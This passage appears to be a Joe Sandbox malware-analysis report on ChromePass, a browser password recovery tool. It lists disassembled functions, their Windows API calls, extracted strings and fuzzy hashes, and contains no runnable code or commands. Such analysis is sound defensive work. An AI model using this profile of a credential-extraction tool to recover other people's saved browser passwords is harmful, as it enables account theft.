                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: %s-mj%08X
                                        • API String ID: 39653677-77246884
                                        • Opcode ID: 6214aa577ba11c95e72b07299b5c22ac23c3152fb9ea02e3572914e5a59f90af
                                        • Instruction ID: 007a3d4d5399354a95510e0c07ae60a0dcf900ee95ee2b5102a424b815092a05
                                        • Opcode Fuzzy Hash: 6214aa577ba11c95e72b07299b5c22ac23c3152fb9ea02e3572914e5a59f90af
                                        • Instruction Fuzzy Hash: 62A16D31A00609EFDB14DF99D980BEEB7B5EF84305F24806FE519A7251D778A9C1DB08
                                        Function 004028C0 Relevance: 6.0, APIs: 4, Instructions: 43encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000414,?,?,00402CBA,?,00000000,00000000,?), ref: 004028DD
                                        • CryptHashData.ADVAPI32(?,00000000,00000000,00000000,?,00402CBA,?,00000000,00000000,?), ref: 004028F1
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000,00008004,?,00402CBA,?,00000000,00000000,?), ref: 00402911
                                        • CryptDestroyHash.ADVAPI32(?,?,00402CBA,?,00000000,00000000,?), ref: 0040291C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                        • String ID:
                                        • API String ID: 1643522540-0
                                        • Opcode ID: 4abc5187658029d04eadc305b3a4a8b5872c38cd536de212c9e6ffa85d2ecb7f
                                        • Instruction ID: 74578af82488be9f60f0e5a89065d5117b9a557822fb1a36c517689b6b1684d7
                                        • Opcode Fuzzy Hash: 4abc5187658029d04eadc305b3a4a8b5872c38cd536de212c9e6ffa85d2ecb7f
                                        • Instruction Fuzzy Hash: 6FF0CD75600108FFDB115FA5DD89D9F7BADFF08354B408036B905E11A1DB75CE149B64
                                        Function 0040109F Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,00000001), ref: 0040125B
                                        • DeleteObject.GDI32(?), ref: 00401267
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040128C
                                        • ShowWindow.USER32(00000000), ref: 00401295
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012A1
                                        • ShowWindow.USER32(00000000), ref: 004012A4
                                        • SetDlgItemTextW.USER32(?,000003EE,00435A10), ref: 004012B5
                                        • SetWindowTextW.USER32(?,ChromePass), ref: 004012C3
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012DB
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: ChromePass
                                        • API String ID: 829165378-1216945463
                                        • Opcode ID: c86ec42037acb386c3d7f19869d454fc0983c514b3a938add632279c4e1b1622
                                        • Instruction ID: 633f5f3240eb59d71ddd47c84ea6a3452a0f5f069d18e330db16ec091ff88c78
                                        • Opcode Fuzzy Hash: c86ec42037acb386c3d7f19869d454fc0983c514b3a938add632279c4e1b1622
                                        • Instruction Fuzzy Hash: 4751AF3060070AEBDB21AFA1DC85E6F7BA5FB04300F50853AF556B65F0CB749992EB18
                                        Function 004099AD Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 004099F2
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409A0A
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00409A28
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409A34
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00409A3C
                                        • memset.MSVCRT ref: 00409A63
                                        • memset.MSVCRT ref: 00409A85
                                        • memset.MSVCRT ref: 00409A9E
                                        • memset.MSVCRT ref: 00409AB2
                                        • memset.MSVCRT ref: 00409ACC
                                        • memset.MSVCRT ref: 00409AE1
                                        • GetCurrentProcess.KERNEL32 ref: 00409AE9
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00409B0C
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00409B3E
                                        • memset.MSVCRT ref: 00409B91
                                        • GetCurrentProcessId.KERNEL32 ref: 00409B9F
                                        • memcpy.MSVCRT(?,004351A0,0000021C), ref: 00409BCD
                                        • wcscpy.MSVCRT ref: 00409BF0
                                        • _snwprintf.MSVCRT ref: 00409C5F
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409C77
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409C81
                                        • SetFocus.USER32(00000000), ref: 00409C88
                                        Strings
                                        • {Unknown}, xrefs: 00409A77
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409C54
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: b1bde3a8192c643e951b1987a295903b517f6871308dc926709a204fcec19dd3
                                        • Instruction ID: f46b8c1d35751f23f638552bba973a409d9d2525afe03ff9faab2e91771420ed
                                        • Opcode Fuzzy Hash: b1bde3a8192c643e951b1987a295903b517f6871308dc926709a204fcec19dd3
                                        • Instruction Fuzzy Hash: 8F71B672900119BFDB219B90EC85EEA377DFF48354F4000B6F908A31A1DB399E958F69
                                        Function 0040A167 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040A194
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A1A0
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A1E2
                                        • GetWindowRect.USER32(?,?), ref: 0040A1ED
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A201
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A20F
                                        • 73A1A570.USER32(?,?,?), ref: 0040A248
                                        • wcslen.MSVCRT ref: 0040A288
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A299
                                        • _snwprintf.MSVCRT ref: 0040A3A9
                                        • SetWindowTextW.USER32(?,?), ref: 0040A3BD
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A3DB
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A411
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A421
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A42F
                                        • GetClientRect.USER32(?,?), ref: 0040A446
                                        • GetWindowRect.USER32(?,?), ref: 0040A450
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A496
                                        • GetClientRect.USER32(?,?), ref: 0040A4A0
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A4D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        • Opcode ID: 3ed63544d24f05a459e2df5bad298fcb738aab0e64971990309182cbbee0f07f
                                        • Instruction ID: 529da0179c780a5d544effdaaa147742988758fb8093b8250eb4cb820fdc3d50
                                        • Opcode Fuzzy Hash: 3ed63544d24f05a459e2df5bad298fcb738aab0e64971990309182cbbee0f07f
                                        • Instruction Fuzzy Hash: 37B1DF71608301AFD720DFA9C984E6FBBE9FF88704F00492DF59992261DB75E8158F26
                                        Function 00408008 Relevance: 19.6, APIs: 13, Instructions: 136windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00408045
                                        • SHGetFileInfoW.SHELL32(0042C47C,00000000,?,000002B4,00004001), ref: 00408062
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0040807C
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004080AE
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 004080E8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408105
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 0040811C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408124
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00408137
                                        • GetSysColor.USER32(0000000F), ref: 0040814B
                                        • DeleteObject.GDI32(?), ref: 0040817F
                                        • DeleteObject.GDI32(00000000), ref: 00408182
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004081A0
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$ColorFileInfomemset
                                        • String ID:
                                        • API String ID: 3623935593-0
                                        • Opcode ID: f1d6e13c9e7902ba1a70fefff220e7e86028e1b9bf1ca88a0e6dc66da0dd0fdd
                                        • Instruction ID: b970c7279dff316045689880826364b4ff07a64489b44e8f4e94a6c15a1ce75a
                                        • Opcode Fuzzy Hash: f1d6e13c9e7902ba1a70fefff220e7e86028e1b9bf1ca88a0e6dc66da0dd0fdd
                                        • Instruction Fuzzy Hash: 0C41B731780308BFE7306FA0DC8AF9B7799FB08B44F400429F7996A1D1C6F665548B69
                                        Function 00409277 Relevance: 16.6, APIs: 11, Instructions: 144windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 004092F3
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00409301
                                        • SelectObject.GDI32(?,?), ref: 00409316
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040934A
                                        • SelectObject.GDI32(00000014,00000005), ref: 00409356
                                          • Part of subcall function 0040910A: GetCursorPos.USER32(?), ref: 00409117
                                          • Part of subcall function 0040910A: GetSubMenu.USER32(?,00000000), ref: 00409125
                                          • Part of subcall function 0040910A: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00409153
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409371
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040937A
                                        • SetCursor.USER32(00000000), ref: 00409381
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 004093A3
                                        • SetFocus.USER32(?), ref: 004093D8
                                        • SetFocus.USER32(?), ref: 0040943C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        • Opcode ID: 71d2e6198dffcef25d3b4c1dca41765da3ad0f2f89c8379894b8b32abfbbe0ea
                                        • Instruction ID: e2851b7f04c43c8903919de8cdb59e50febb0207dd523eeb4f249a4d78b12013
                                        • Opcode Fuzzy Hash: 71d2e6198dffcef25d3b4c1dca41765da3ad0f2f89c8379894b8b32abfbbe0ea
                                        • Instruction Fuzzy Hash: 5351C031604105FFDB149F64C989AAEBB65FF48300F104076F915EB2E2CB35AC12CBA9
                                        Function 0041A096 Relevance: 14.0, APIs: 1, Strings: 8, Instructions: 458COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000044), ref: 0041A4EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: %s: %s$%s: %s.%s$%s: %s.%s.%s$ambiguous column name$misuse of aliased aggregate %s$new$no such column$old
                                        • API String ID: 3510742995-918941476
                                        • Opcode ID: ce5f642fff32ace456ff0f27eee6f0866df3f52276b77a5c37dfeaba0475903e
                                        • Instruction ID: a8d501e401562138e274917497f99ccbd38e5665a64f9815cc2eeeda41eb8903
                                        • Opcode Fuzzy Hash: ce5f642fff32ace456ff0f27eee6f0866df3f52276b77a5c37dfeaba0475903e
                                        • Instruction Fuzzy Hash: D1026E70901219DFDF14DF64C885AEEB7B1BF08324F14816BD815AB391D738ADA1CB9A
                                        Function 00406925 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 00406720
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040672E
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040673F
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 00406756
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040675F
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406965
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00406981
                                        • memcpy.MSVCRT(?,@JC,00000014), ref: 004069A6
                                        • memcpy.MSVCRT(?,@JC,00000014,?,@JC,00000014), ref: 004069BA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406A3D
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00406A47
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406A7F
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                          • Part of subcall function 004059FD: LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                          • Part of subcall function 004059FD: memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 004059FD: wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 004059FD: wcslen.MSVCRT ref: 00405A9C
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: @JC$d
                                        • API String ID: 1140211610-2744344691
                                        • Opcode ID: 1a53a92dabb9dce45c029cb191dcd57932caf01fac0d9be67952e58d6618586a
                                        • Instruction ID: 261557b8362d8e1841dc40049acf99a3ac1321b6604e5dabc247962c1d4a2784
                                        • Opcode Fuzzy Hash: 1a53a92dabb9dce45c029cb191dcd57932caf01fac0d9be67952e58d6618586a
                                        • Instruction Fuzzy Hash: B251BC72600700AFD724DF29C586B5AB7E4FF48318F10852EE55ADB781EB74E940CB44
                                        Function 0040AAE5 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,004078CC,?,?), ref: 0040AB1C
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,004078CC,?,?), ref: 0040AB48
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004078CC,?,?), ref: 0040AB62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 3e09f1ba55b3964a42479ffeb7638ca62a2aabcbaf2d3cdef27350fe23f380b2
                                        • Instruction ID: 10033f927b9eafeb0d070270d456198b9870783f1933e151f5fc4f6a633e6a56
                                        • Opcode Fuzzy Hash: 3e09f1ba55b3964a42479ffeb7638ca62a2aabcbaf2d3cdef27350fe23f380b2
                                        • Instruction Fuzzy Hash: 5601C056F5433171E63120156C42F762166DB63725FE4413BFB86352C0A1ED19A3919F
                                        Function 004059FD Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                        • wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 00405EEF: memset.MSVCRT ref: 00405F02
                                          • Part of subcall function 00405EEF: _itow.MSVCRT ref: 00405F10
                                        • wcslen.MSVCRT ref: 00405A9C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                        • LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                        • memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00405A0B,00401F52,?,?), ref: 00405995
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00405A0B,00401F52,?,?), ref: 004059B3
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059D1
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: 5a57db18c3fcdba6add60d60e7aa980d406878a611af4cde56f8485491c562c9
                                        • Instruction ID: b57a637b8855130ffa1a7504adc270446ba2cec8e5bfd8050038c7f01de010dc
                                        • Opcode Fuzzy Hash: 5a57db18c3fcdba6add60d60e7aa980d406878a611af4cde56f8485491c562c9
                                        • Instruction Fuzzy Hash: FD413971600E019FCB18EB19EC95E2B33A5F784309750713AE812A72A1DF39AC52DF5C
                                        Function 00406159 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040617E
                                        • GetDlgCtrlID.USER32(?), ref: 00406189
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 004061A0
                                        • memset.MSVCRT ref: 004061C7
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 004061DE
                                        • _wcsicmp.MSVCRT ref: 004061F0
                                          • Part of subcall function 00406031: memset.MSVCRT ref: 00406044
                                          • Part of subcall function 00406031: _itow.MSVCRT ref: 00406052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 89e785f6619a180bef2736402fca55b64736eb51bd0a17ce5aa6f62226469910
                                        • Instruction ID: c9c998f0b0d1e52276907cba2e903802b90230db4748a45949daaeea23d83061
                                        • Opcode Fuzzy Hash: 89e785f6619a180bef2736402fca55b64736eb51bd0a17ce5aa6f62226469910
                                        • Instruction Fuzzy Hash: 8C11AB325002297BE724E791DC89A9F776DEF04350F4040A6F519D1193DB344A91CB59
                                        Function 004042DE Relevance: 10.6, APIs: 7, Instructions: 123windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 004042F5
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 0040430E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 0040431B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404327
                                        • memset.MSVCRT ref: 0040438B
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 004043C0
                                        • SetFocus.USER32(?), ref: 00404444
                                        Memory Dump Source
